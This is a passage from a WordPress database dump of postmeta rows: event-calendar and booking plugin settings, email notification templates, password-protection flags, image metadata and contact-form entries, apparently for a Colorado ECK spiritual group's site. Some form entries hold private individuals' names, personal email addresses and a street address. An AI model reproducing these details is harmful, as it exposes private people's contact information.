338-4544'),(135205,264172,'_field_33',''),(135206,264172,'_field_34','809 Skyway Blvd'),(135207,264172,'_field_35','Colorado Springs'),(135208,264172,'_field_36','CO'),(135209,264172,'_field_37','US'),(135210,264172,'_field_39','My zip code is 80905'),(135211,264172,'_form_id','4'),(135212,264172,'_seq_num','11'),(135213,264173,'_field_353','LYNNZIE'),(135214,264173,'_field_354','SUTTON'),(135215,264173,'_field_355','lynnzies3@gmail.com'),(135216,264173,'_field_357','What chapter are you on?'),(135217,264173,'_field_358','I would like to join you in finding the depths of the Spiritual Laws of Life.'),(135218,264173,'_form_id','38'),(135219,264173,'_seq_num','4'),(135220,264174,'protect_children',''),(135221,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135222,264174,'_EventOrigin','events-calendar'),(135223,264174,'protect_children',''),(135224,264174,'protect_children',''),(135225,264174,'protect_children',''),(135226,264174,'protect_children',''),(135227,264174,'protect_children',''),(135228,264174,'protect_children',''),(135229,264174,'protect_children',''),(135230,264174,'protect_children',''),(135231,264174,'protect_children',''),(135232,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135264,264174,'_EventCurrencyPosition','prefix'),(135233,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135263,264174,'_EventCurrencySymbol',''),(135234,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135262,264174,'_EventDuration','3600'),(135265,264174,'_EventCost',''),(135235,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135261,264174,'_EventEndDateUTC','2021-04-08 02:00:00'),(135236,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135260,264174,'_EventStartDateUTC','2021-04-08 01:00:00'),(135266,264174,'_EventURL',''),(135237,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135259,264174,'_EventEndDate','2021-04-07 20:00:00'),(135267,264174,'_EventTimezone','America/Denver'),(135238,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135258,264174,'_EventStartDate','2021-04-07 19:00:00'),(135268,264174,'_EventTimezoneAbbr','MDT'),(135239,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135257,264174,'_EventShowMap',''),(135269,264174,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(135240,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135256,264174,'_EventShowMapLink',''),(135270,264174,'_RTECregistrationsDisabled','1'),(135271,264174,'_RTECdeadlineType','start'),(135241,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135255,264174,'boldgrid_hide_page_title','0'),(135272,264174,'_RTECwhoCanRegister','any'),(135242,264174,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616061339;s:12:\"_EventOrigin\";i:1616061340;s:13:\"_thumbnail_id\";i:1616081184;s:24:\"boldgrid_hide_page_title\";i:1616061340;s:17:\"_EventShowMapLink\";i:1616061340;s:13:\"_EventShowMap\";i:1616061340;s:15:\"_EventStartDate\";i:1616062604;s:13:\"_EventEndDate\";i:1616062604;s:18:\"_EventStartDateUTC\";i:1616062604;s:16:\"_EventEndDateUTC\";i:1616062604;s:14:\"_EventDuration\";i:1616061340;s:20:\"_EventCurrencySymbol\";i:1616061340;s:22:\"_EventCurrencyPosition\";i:1616061340;s:10:\"_EventCost\";i:1616061340;s:9:\"_EventURL\";i:1616061340;s:14:\"_EventTimezone\";i:1616061340;s:18:\"_EventTimezoneAbbr\";i:1616062604;s:27:\"_EventNextPendingRecurrence\";i:1616061340;s:26:\"_RTECregistrationsDisabled\";i:1616061340;s:17:\"_RTECdeadlineType\";i:1616061340;s:19:\"_RTECwhoCanRegister\";i:1616061340;s:23:\"_RTEClimitRegistrations\";i:1616061340;s:21:\"_RTECmaxRegistrations\";i:1616061340;s:16:\"_EventRecurrence\";i:1616061340;s:18:\"_RTECnumRegistered\";i:1616061340;s:13:\"_EventVenueID\";i:1616061340;s:12:\"_dp_original\";i:1616061340;s:10:\"_edit_last\";i:1616061560;s:12:\"post_content\";i:1616081201;s:16:\"tribe_events_cat\";i:1616102801;s:11:\"post_status\";i:1616062604;s:10:\"post_title\";i:1616080429;}'),(135244,264174,'_EventOrigin','events-calendar'),(135245,264174,'_EventOrigin','events-calendar'),(135246,264174,'_EventOrigin','events-calendar'),(135247,264174,'_EventOrigin','events-calendar'),(135248,264174,'_EventOrigin','events-calendar'),(135249,264174,'_EventOrigin','events-calendar'),(135250,264174,'_EventOrigin','events-calendar'),(135251,264174,'_EventOrigin','events-calendar'),(135252,264174,'_EventOrigin','events-calendar'),(135253,264174,'_EventOrigin','events-calendar'),(135254,264174,'_thumbnail_id','264204'),(135243,264174,'_EventOrigin','events-calendar'),(135273,264174,'_RTEClimitRegistrations','0'),(135274,264174,'_RTECmaxRegistrations','30'),(135275,264174,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(135276,264174,'_RTECnumRegistered','0'),(135277,264174,'_EventVenueID','262435'),(135279,264174,'_dp_original','263641'),(135280,264174,'_edit_lock','1619736468:2'),(135281,264174,'_edit_last','2'),(144617,265247,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144616,265247,'passster_activate_protection',NULL),(144615,265247,'passster_activate_global_protection',NULL),(144614,265247,'passster_protection_type','password'),(144613,265247,'mec_advanced_days','a:0:{}'),(144612,265247,'mec_repeat_end_at_date',''),(144611,265247,'mec_in_days',''),(144610,265247,'mec_not_in_days',''),(144609,265247,'mec_hourly_schedules','a:0:{}'),(144608,265247,'mec_fees_global_inheritance','1'),(144607,265247,'mec_tickets','a:0:{}'),(144606,265247,'mec_booking','a:0:{}'),(144605,265247,'mec_fees','a:0:{}'),(144604,265247,'mec_ticket_variations_global_inheritance','1'),(144603,265247,'mec_ticket_variations','a:0:{}'),(144602,265247,'mec_reg_fields_global_inheritance','1'),(144601,265247,'mec_reg_fields','a:0:{}'),(144600,265247,'mec_bfixed_fields','a:0:{}'),(144599,265247,'mec_op','a:0:{}'),(144598,265247,'mec_fields','a:0:{}'),(144597,265247,'mec_event_status','EventScheduled'),(144596,265247,'mec_hide_end_time','0'),(144595,265247,'mec_hide_time','0'),(144594,265247,'one_occurrence','0'),(144593,265247,'mec_comment',''),(144592,265247,'mec_timezone','global'),(143166,265099,'_seq_num','125'),(143165,265099,'_form_id','21'),(143164,265099,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(143163,265099,'_field_228','US'),(143162,265099,'_field_227','CO'),(143161,265099,'_field_226','leanurse@gmail.com'),(143160,265099,'_field_225','Lehmann'),(143154,265096,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:614;s:6:\"height\";i:345;s:4:\"file\";s:25:\"2021/05/child-beach-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"child-beach-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"child-beach-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:25:\"child-beach-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:25:\"child-beach-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:25:\"child-beach-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:25:\"child-beach-1-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"child-beach-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143153,265096,'_wp_attached_file','2021/05/child-beach-1.jpg'),(143152,265095,'passster_protection_type','password'),(143151,265095,'passster_activate_protection',NULL),(143150,265095,'passster_activate_global_protection',NULL),(143149,265095,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(143148,265095,'_thumbnail_id','265096'),(143147,265095,'mec_display_cancellation_reason_in_single_page',''),(143146,265095,'mec_cancelled_reason',''),(143145,265095,'mec_moved_online_link',''),(143144,265095,'mec_event_status','EventScheduled'),(143143,265095,'mec_fields','a:0:{}'),(143142,265095,'mec_bfixed_fields','a:0:{}'),(143141,265095,'mec_public','1'),(143140,265095,'mec_countdown_method','global'),(143139,265095,'mec_timezone','global'),(143138,265095,'one_occurrence','0'),(143137,265095,'mec_additional_location_ids','a:0:{}'),(143136,265095,'mec_additional_organizer_ids','a:0:{}'),(143135,265095,'mec_currency','a:0:{}'),(143134,265095,'mec_cost',''),(143133,265095,'mec_more_info_target','_self'),(143132,265095,'mec_more_info_title',''),(143131,265095,'mec_more_info',''),(143130,265095,'mec_read_more',''),(143129,265095,'_edit_last','2'),(143128,265095,'_edit_lock','1622056832:2'),(143127,265095,'mec_event_date_submit','20210422154949'),(143126,265095,'mec_op','a:0:{}'),(143125,265095,'mec_reg_fields','a:0:{}'),(143124,265095,'mec_reg_fields_global_inheritance','1'),(143123,265095,'mec_ticket_variations','a:0:{}'),(143122,265095,'mec_ticket_variations_global_inheritance','1'),(143121,265095,'mec_fees','a:0:{}'),(143120,265095,'mec_fees_global_inheritance','1'),(143119,265095,'mec_tickets','a:0:{}'),(143118,265095,'mec_booking','a:0:{}'),(143117,265095,'mec_hourly_schedules','a:0:{}'),(143116,265095,'mec_not_in_days',''),(143115,265095,'mec_in_days',''),(143114,265095,'mec_advanced_days','a:0:{}'),(143113,265095,'mec_repeat_end_at_date',''),(143112,265095,'mec_repeat_end_at_occurrences',''),(143111,265095,'mec_repeat_end',''),(143110,265095,'mec_repeat_interval','1'),(143109,265095,'mec_repeat_type',''),(143108,265095,'mec_repeat_status','0'),(143107,265095,'mec_comment',''),(143106,265095,'mec_hide_end_time','0'),(143105,265095,'mec_hide_time','0'),(143104,265095,'mec_allday','0'),(143103,265095,'mec_certain_weekdays','a